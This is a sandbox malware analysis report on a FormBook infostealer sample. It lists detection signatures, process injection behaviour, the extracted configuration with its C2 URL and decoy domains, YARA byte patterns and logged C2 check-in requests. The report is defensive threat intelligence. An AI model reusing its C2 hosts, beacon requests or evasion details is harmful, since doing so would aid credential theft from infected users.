Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report RCS76393.exe

Overview

General Information

Sample Name:RCS76393.exe
Analysis ID:383936
MD5:1ab1c3129fa0764ea0702da70f3ef569
SHA1:ee8cd1946b58390f4599056df1472d01cf85a543
SHA256:5d1870672eff4e2ec6d699d654d5268051f7a56f8ca991fefa538eeef380a89c
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RCS76393.exe (PID: 6500 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
    • RCS76393.exe (PID: 6544 cmdline: 'C:\Users\user\Desktop\RCS76393.exe' MD5: 1AB1C3129FA0764EA0702DA70F3EF569)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6848 cmdline: /c del 'C:\Users\user\Desktop\RCS76393.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.batiktintaemas.com/goei/"], "decoy": ["bet365o2.com", "gulf-landlord.info", "foodsystemsjusticeproject.com", "ronwongart.com", "fwgkdhg.icu", "armanrugservice.com", "mapadequito.com", "vbkulkarni.com", "ltsbinge.com", "creativem2.com", "mindflexlab.com", "ushealthvisa.com", "247carkeyslondon.com", "addthat.xyz", "zanzan8.com", "legendsalliance.net", "shopflyonline.com", "csgo-roll.net", "reutbergcapital.com", "mediaworkhouse.com", "office-tourism-tirana.com", "evecrude.xyz", "sportwillwin.com", "cluskmusk.com", "her2mymeme.com", "rsw3313.com", "digitalmarketingmoves.com", "seaworldminecraft.com", "onlinecollegetherapy.com", "ourmonaca.com", "generalflix.com", "limonproduce.com", "casalomasymphonyorchestra.com", "karyapertama.com", "massaponaxhighschool.com", "covidtracksb.com", "breathharbour.net", "italianrealestateagents.com", "xn--ga-c9a.com", "libreo.club", "leverhump.store", "kevinrsamuels.network", "pimpmyrecipe.com", "win-back.online", "kelasipo.com", "caross-china.com", "ly-iot.com", "nolimitsynthetics.net", "epicfriend.club", "19come.com", "lcjzjt.com", "lxpvccard.com", "distributorfocuson.com", "looneytunesrun.com", "mariebiernacki.com", "maquinaclub.com", "randalldavisauthor.com", "niggeruprising.com", "theexpatweightcoach.com", "mex33.info", "imbravura.com", "baldosasanjose.com", "akindousa.com", "ourmunera.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.1.RCS76393.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.1.RCS76393.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.RCS76393.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        3.2.RCS76393.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.RCS76393.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.batiktintaemas.com/goei/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.batiktintaemas.com/goei/"], "decoy": ["bet365o2.com", "gulf-landlord.info", "foodsystemsjusticeproject.com", "ronwongart.com", "fwgkdhg.icu", "armanrugservice.com", "mapadequito.com", "vbkulkarni.com", "ltsbinge.com", "creativem2.com", "mindflexlab.com", "ushealthvisa.com", "247carkeyslondon.com", "addthat.xyz", "zanzan8.com", "legendsalliance.net", "shopflyonline.com", "csgo-roll.net", "reutbergcapital.com", "mediaworkhouse.com", "office-tourism-tirana.com", "evecrude.xyz", "sportwillwin.com", "cluskmusk.com", "her2mymeme.com", "rsw3313.com", "digitalmarketingmoves.com", "seaworldminecraft.com", "onlinecollegetherapy.com", "ourmonaca.com", "generalflix.com", "limonproduce.com", "casalomasymphonyorchestra.com", "karyapertama.com", "massaponaxhighschool.com", "covidtracksb.com", "breathharbour.net", "italianrealestateagents.com", "xn--ga-c9a.com", "libreo.club", "leverhump.store", "kevinrsamuels.network", "pimpmyrecipe.com", "win-back.online", "kelasipo.com", "caross-china.com", "ly-iot.com", "nolimitsynthetics.net", "epicfriend.club", "19come.com", "lcjzjt.com", "lxpvccard.com", "distributorfocuson.com", "looneytunesrun.com", "mariebiernacki.com", "maquinaclub.com", "randalldavisauthor.com", "niggeruprising.com", "theexpatweightcoach.com", "mex33.info", "imbravura.com", "baldosasanjose.com", "akindousa.com", "ourmunera.net"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RCS76393.exeJoe Sandbox ML: detected
          Source: 3.1.RCS76393.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.RCS76393.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RCS76393.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 198.185.159.144:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.batiktintaemas.com/goei/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.addthat.xyz
          Source: C:\Windows\explorer.exeDNS query: www.evecrude.xyz
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ly-iot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ronwongart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.pimpmyrecipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.foodsystemsjusticeproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.batiktintaemas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.addthat.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.evecrude.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: IOFLOODUS IOFLOODUS
          Source: Joe Sandbox ViewASN Name: MISSDOMAINSE MISSDOMAINSE
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ly-iot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=GY2gQUF0Rr/aPbkdLLDyshZLrmGphrTrFvzfodUnQAaoW3qjeuccMn3ranK+t6GyiOOsZqKqHA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.ronwongart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.pimpmyrecipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.foodsystemsjusticeproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.batiktintaemas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.addthat.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1Host: www.evecrude.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ly-iot.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Thu, 08 Apr 2021 10:47:16 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 6
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.347164157.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RCS76393.exe.400000.0.unpack, type: UNPACKEDPE
